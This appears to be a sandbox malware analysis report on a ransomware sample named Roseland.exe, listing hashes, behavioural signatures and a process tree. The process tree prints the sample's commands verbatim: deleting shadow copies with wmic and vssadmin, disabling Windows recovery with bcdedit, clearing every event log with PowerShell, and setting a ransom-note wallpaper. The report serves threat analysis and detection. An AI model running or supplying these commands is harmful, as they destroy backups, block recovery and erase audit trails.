Resubmissions

16-03-2023 09:24

230316-ldhxdaab62 10

16-03-2023 09:12

230316-k56l3sab26 10

30-01-2023 14:58

230130-sb9ewaag73 9

30-01-2023 14:44

230130-r4m7nscd8s 9

13-01-2023 09:23

230113-lcgmxsfh22 9

Analysis

  • max time kernel
    51s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    30-01-2023 14:44

General

  • Target

    Roseland.exe

  • Size

    807KB

  • MD5

    19944159dfa94a1b75effd85e6b906dc

  • SHA1

    250acf87366f4c0cf91679a0e93dfc79954f0f10

  • SHA256

    bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705

  • SHA512

    c791840f59c2fc906c197c43e0e1717b9504cf46177a3688ecbd4937cdbf95349d68cc1e63649b85f02df4e6990c4df4756dd8267b062ea5271dd61fc3e508b0

  • SSDEEP

    12288:0Z4s3rg9u/2/oT+NXtHLlP/O+OeO+OeNhBBhhBBAtHg9rjI+LXJ0ivlzkHBDsYA7:u4s+oT+NXBLi0rjFXvyHBlbnCZa8

Score
9/10

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Roseland.exe
    "C:\Users\Admin\AppData\Local\Temp\Roseland.exe"
    1⤵
    • Modifies extensions of user files
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1744
    • C:\Windows\system32\cmd.exe
      cmd /c wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2000
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:268
    • C:\Windows\system32\cmd.exe
      cmd /c vssadmin.exe Delete Shadows /All /Quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:956
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:472
    • C:\Windows\system32\cmd.exe
      cmd /c bcdedit /set {default} recoveryenabled No
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:320
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:764
    • C:\Windows\system32\cmd.exe
      cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1456
    • C:\Windows\system32\cmd.exe
      cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:564
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2844
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1612601169.png /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:2920
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
        3⤵
          PID:2932
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2480

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\GET_YOUR_FILES_BACK.txt

      Filesize

      1011B

      MD5

      6d81ed40ba0a283e5483bfe6a448e9d7

      SHA1

      0c847a5f9df743b13e1aa11b4c24a4309e9a7119

      SHA256

      b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d

      SHA512

      8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      de81fdc2a98fa8b585f097a98b1b15e0

      SHA1

      aee4694b60d3359e282b08b1c237641a2241c7df

      SHA256

      c0ca00e1047dc6ce4175da2bd41fd697f3c8471eea08f5f255c85467b0f884dc

      SHA512

      10a6471994caf26b7fbb2bbfaecd29880b761b21d68e8a6ecfb89f9f05e0b63b938beb8f85c46196411a8c233b2e1de7682a71e010acba1a2e9010f55452a0f9

    • memory/268-61-0x0000000000000000-mapping.dmp

    • memory/320-56-0x0000000000000000-mapping.dmp

    • memory/472-60-0x0000000000000000-mapping.dmp

    • memory/564-58-0x0000000000000000-mapping.dmp

    • memory/764-62-0x0000000000000000-mapping.dmp

    • memory/956-55-0x0000000000000000-mapping.dmp

    • memory/1456-59-0x0000000000000000-mapping.dmp

    • memory/1476-57-0x0000000000000000-mapping.dmp

    • memory/2000-54-0x0000000000000000-mapping.dmp

    • memory/2404-68-0x000000000224B000-0x000000000226A000-memory.dmp

      Filesize

      124KB

    • memory/2404-67-0x0000000002244000-0x0000000002247000-memory.dmp

      Filesize

      12KB

    • memory/2404-66-0x000007FEF3830000-0x000007FEF438D000-memory.dmp

      Filesize

      11.4MB

    • memory/2404-65-0x000007FEF4390000-0x000007FEF4DB3000-memory.dmp

      Filesize

      10.1MB

    • memory/2404-69-0x0000000002244000-0x0000000002247000-memory.dmp

      Filesize

      12KB

    • memory/2404-70-0x000000000224B000-0x000000000226A000-memory.dmp

      Filesize

      124KB

    • memory/2404-63-0x0000000000000000-mapping.dmp

    • memory/2404-64-0x000007FEFC201000-0x000007FEFC203000-memory.dmp

      Filesize

      8KB

    • memory/2844-75-0x000007FEF3A10000-0x000007FEF456D000-memory.dmp

      Filesize

      11.4MB

    • memory/2844-74-0x000007FEF4570000-0x000007FEF4F93000-memory.dmp

      Filesize

      10.1MB

    • memory/2844-76-0x0000000002454000-0x0000000002457000-memory.dmp

      Filesize

      12KB

    • memory/2844-71-0x0000000000000000-mapping.dmp

    • memory/2844-78-0x000000000245B000-0x000000000247A000-memory.dmp

      Filesize

      124KB

    • memory/2844-81-0x0000000002454000-0x0000000002457000-memory.dmp

      Filesize

      12KB

    • memory/2844-82-0x000000000245B000-0x000000000247A000-memory.dmp

      Filesize

      124KB

    • memory/2920-79-0x0000000000000000-mapping.dmp

    • memory/2932-80-0x0000000000000000-mapping.dmp